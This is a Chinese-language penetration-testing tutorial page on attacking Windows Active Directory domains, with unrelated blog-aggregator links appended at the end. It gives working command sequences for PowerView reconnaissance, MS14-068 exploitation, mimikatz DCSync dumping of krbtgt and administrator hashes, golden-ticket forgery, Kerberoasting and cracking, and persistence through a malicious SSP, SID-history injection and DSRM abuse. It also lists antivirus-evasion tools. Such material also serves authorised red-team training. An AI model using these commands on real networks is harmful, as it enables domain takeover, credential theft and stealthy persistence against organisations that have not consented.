渗透测试入门9之域渗透
渗透测试入门9之域渗透
信息搜集
powerview.ps1
Get-NetDomain - gets the name of the current user's domain
Get-NetForest - gets the forest associated with the current user's domain
Get-NetForestDomains - gets all domains for the current forest
Get-NetDomainControllers - gets the domain controllers for the current computer's domain
Get-NetCurrentUser - gets the current [domain\]username
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Get-NetUserSPNs - gets all user ServicePrincipalNames
Get-NetOUs - gets data for domain organization units
Get-NetGUIDOUs - finds domain OUs linked to a specific GUID
Invoke-NetUserAdd - adds a local or domain user
Get-NetGroups - gets a list of all current groups in the domain
Get-NetGroup - gets data for each user in a specified domain group
Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts
Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts
Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts
Invoke-NetGroupUserAdd - adds a user to a specified local or domain group
Get-NetComputers - gets a list of all current servers in the domain
Get-NetFileServers - get a list of file servers used by current domain users
Get-NetShare - gets share information for a specified server
Get-NetLoggedon - gets users actively logged onto a specified server
Get-NetSessions - gets active sessions on a specified server
Get-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles
Get-NetConnections - gets active connections to a specific server resource (share)
Get-NetFiles - gets open files on a server
Get-NetProcesses - gets the remote processes and owners on a remote server
BloodHound
获取域控的方法
SYSVOL
SYSVOL是指存储域公共文件服务器副本的共享文件夹,它们在域中所有的域控制器之间复制。 Sysvol文件夹是安装AD时创建的,它用来存放GPO、Script等信息。同时,存放在Sysvol文件夹中的信息,会复制到域中所有DC上。 相关阅读:
- 寻找SYSVOL里的密码和攻击GPP(组策略偏好)
- Windows Server 2008 R2之四管理Sysvol文件夹
- SYSVOL中查找密码并利用组策略首选项
- 利用SYSVOL还原组策略中保存的密码
MS14-068 Kerberos
python ms14-068.py -u 域用户@域名 -p 密码 -s 用户SID -d 域主机
利用mimikatz将工具得到的TGT_domainuser@SERVER.COM.ccache写入内存,创建缓存证书:
mimikatz.exe "kerberos::ptc c:TGT_darthsidious@pentest.com.ccache" exit
net use k: \pentest.comc$
相关阅读 :
- Kerberos的工具包PyKEK
- 深入解读MS14-068漏洞
- Kerberos的安全漏洞
SPN扫描
Kerberoast可以作为一个有效的方法从Active Directory中以普通用户的身份提取服务帐户凭据,无需向目标系统发送任何数据包。 SPN是服务在使用Kerberos身份验证的网络上的唯一标识符。它由服务类,主机名和端口组成。在使用Kerberos身份验证的网络中,必须在内置计算机帐户(如NetworkService或LocalSystem)或用户帐户下为服务器注册SPN。对于内部帐户,SPN将自动进行注册。但是,如果在域用户帐户下运行服务,则必须为要使用的帐户的手动注册SPN。 SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。 相关阅读 :
- 非扫描式的SQL Server发现
- SPN扫描
- 扫描SQLServer的脚本
Kerberos的黄金门票
在域上抓取的哈希
lsadump::dcsync /domain:pentest.com /user:krbtgt
kerberos::purge
kerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash值 /ticket:adinistrator.kiribi
kerberos::ptt administrator.kiribi
kerberos::tgt
net use k: \pnet use k: \pentest.comc$
相关阅读 :
- https://adsecurity.org/?p=1640
- 域服务账号破解实践
- Kerberos的认证原理
- 深刻理解windows安全认证机制ntlm&Kerberos
Kerberos的银票务
黄金票据和白银票据的一些区别: Golden Ticket:伪造TGT,可以获取任何Kerberos服务权限 银票:伪造TGS,只能访问指定的服务 加密方式不同: Golden Ticket由krbtgt的hash加密 Silver Ticket由服务账号(通常为计算机账户)Hash加密 认证流程不同: 金票在使用的过程需要同域控通信 银票在使用的过程不需要同域控通信 相关阅读 :
- 攻击者如何使用Kerberos的银票来利用系统
- 域渗透——Pass The Ticket
域服务账号破解
与上面SPN扫描类似的原理 https://github.com/nidem/kerberoast 获取所有用作SPN的帐户
setspn -T PENTEST.com -Q */*
从Mimikatz的RAM中提取获得的门票
kerberos::list /export
用rgsrepcrack破解
tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
凭证盗窃
从搜集的密码里面找管理员的密码
地址解析协议
实在搞不定再搞ARP
获取AD哈希
- 使用VSS卷影副本
- Ntdsutil中获取NTDS.DIT文件
- PowerShell中提取NTDS.DIT -->Invoke-NinaCopy
- 使用Mimikatz提取
mimikatz lsadump::lsa /inject exit
- 使用PowerShell Mimikatz
- 使用Mimikatz的DCSync 远程转储Active Directory凭证 提取 KRBTGT用户帐户的密码数据:
Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt"exit
管理员用户帐户提取密码数据:
Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator" exit
- NTDS.dit中提取哈希 使用esedbexport恢复以后使用ntdsxtract提取
AD持久化
活动目录持久性技巧
https://adsecurity.org/?p=1929 DS恢复模式密码维护 DSRM密码同步
Windows Server 2008 需要安装KB961320补丁才支持DSRM密码同步,Windows Server 2003不支持DSRM密码同步。KB961320:https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni,可参考:[巧用DSRM密码同步将域控权限持久化](http://drops.xmd5.com/static/drops/tips-9297.html)
DCshadow
Security Support Provider
简单的理解为SSP就是一个DLL,用来实现身份认证
privilege::debug
misc::memssp
这样就不需要重启c:/windows/system32可看到新生成的文件kiwissp.log
SID History
SID历史记录允许另一个帐户的访问被有效地克隆到另一个帐户
mimikatz "privilege::debug" "misc::addsid bobafett ADSAdministrator"
AdminSDHolder&SDProp
利用AdminSDHolder&SDProp(重新)获取域管理权限
组策略
https://adsecurity.org/?p=2716 策略对象在持久化及横向渗透中的应用
Hook PasswordChangeNotify
http://wooyun.jozxing.cc/static/drops/tips-13079.html
TIPS
《域渗透——Dump Clear-Text Password after KB2871997 installed》 《域渗透——Hook PasswordChangeNotify》
可通过Hook PasswordChangeNotify实时记录域控管理员的新密码
《域渗透——Local Administrator Password Solution》
域渗透时要记得留意域内主机的本地管理员账号
《域渗透——利用SYSVOL还原组策略中保存的密码》
相关工具
BloodHound CrackMapExec DeathStar
利用过程:http://www.freebuf.com/sectool/160884.html
在远程系统上执行程序
- At
- Psexec
- WMIC
- Wmiexec
- Smbexec
- Powershell remoting
- DCOM
IOT相关
- 1、路由器 routersploit
- 2、打印机 PRET
- 3、IOT exp https://www.exploitee.rs/
- 4、相关 OWASP-Nettacker isf icsmaster
中间人
- Cain
- Ettercap
- Responder
- MITMf
- 3r/MITMf)
规避杀软及检测
Bypass Applocker
UltimateAppLockerByPassList https://lolbas-project.github.io/
bypassAV
- Empire
- PEspin
- Shellter
- Ebowla
- Veil
- PowerShell
- Python
- 代码注入技术Process Doppelgänging
- ...
渗透测试入门9之域渗透相关推荐
- 渗透测试入门8之端口渗透
渗透测试入门8之端口渗透 端口扫描 1.端口的指纹信息(版本信息) 2.端口所对应运行的服务 3.常见的默认端口号 4.尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 ...
- 渗透测试入门23之OSCP渗透测试认证经验分享
"120天的旅程即将结束,以一场历时24小时没有选择题的考试,收获屠龙路上第一座里程碑.-" 这是我通过OSCP认证考试时,第一时间的感受.自豪和欣喜之情不亚于2008年我拿下CC ...
- 渗透测试入门21之Metasploit渗透测试常用流程
Metasploit是一个免费的.可下载的框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击.它具有图形化界面和命令行界面,这里讲的是msfconsole惯用的操作流程.本章使用的metas ...
- 渗透测试入门1之信息收集
渗透测试入门1之信息收集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 子域名获取 字典列表 邮箱列表获 ...
- 渗透测试入门5之内网信息搜集
渗透测试入门5之内网信息搜集 本机信息搜集 1.用户列表 windows用户列表 分析邮件用户,内网[域]邮件用户,通常就是内网[域]用户 2.进程列表 分析杀毒软件/安全监控工具等 邮件客户端 VP ...
- Android渗透测试Android渗透测试入门教程大学霸
Android渗透测试Android渗透测试入门教程大学霸 第1章 Android渗透测试 Android是一种基于Linux的自由及开放源代码的操作系统,主要用于移动设备,如智能手机.平板等.目前 ...
- 渗透测试入门24之渗透测试参考书、课程、工具、认证
白帽子渗透测试入门资源:参考书.课程.工具.认证文章目录 前言 名词解析 Pwk课程与OSCP证书 CTF 工具 参考书 相关文献推荐 资源打包前言 初入渗透测试领域,过程中遇到不少错综复杂的知识,也 ...
- 渗透测试入门3之隐匿攻击
渗透测试入门3之隐匿攻击 1. Command and Control ICMP :https://pentestlab.blog/2017/07/28/command-and-control-icm ...
- 渗透测试入门7之权限维持
渗透测试入门7之权限维持 系统后门 Windows 1.密码记录工具 WinlogonHack WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 ...
最新文章
- 学 Win32 汇编[17]: 关于压栈(PUSH)与出栈(POP) 之一
- 《从零开始学Swift》学习笔记(Day 7)——Swift 2.0中的print函数几种重载形式
- 二叉查找树-优化版,使用了指针引用
- C++中this指针的用法详解
- 花式模拟【栈结构】做“日志分析”(洛谷P1165题题解,Java语言描述)
- ip、url威胁情报库(开源)
- redis的安装和常用命令
- English--不定式
- 国际直拨电话号码格式
- 人工智能设计概述(二)
- ARCGIS 栅格转点操作步骤
- 新的掌舵手已就位,汽车之家这艘船将驶向何方?
- pytorch 将数据集加载到内存后再训练
- Day11 - Ruby的block,proc,lamdba方法比较
- DB2 错误解决方案:A system temporary table space with sufficient page size does not exist.. SQLCODE=-1585,
- 哈希表除留取余法的桶个数为什么是质数
- java中除法和取余的若干注意
- 问卷数据分析方法都有哪些?
- Unity 安装 Device Simulator
- 内存泄漏分析框架LeakCanary的使用与原理解析
热门文章
- php怎么进行异步编程,php异步编程是怎样的?
- 转:MSDN Visual系列:MOSS企业级搜索之一——在搜索中心里创建自定义搜索页面和标签选项卡...
- [深入React] 1. 开发环境搭建
- 全面控制Windows任务栏
- NeurIPS2021 港大腾讯AI Lab牛津提出:CARE,让CNN和Transformer能在对比学习中“互帮互助”!...
- 一个方案搞定从模型量化到端侧部署全流程
- NeurIPS2019无人驾驶研究成果大总结(含大量论文及项目数据)
- 想转行,是要入坑Python还是Java?这问题还用问?
- 小伙C++代码实现短信表白,软萌甜炸,送给你最喜欢的人!你值得拥有
- C语言/C++程序员大神打造纯C的电子时钟(加图形库+源码)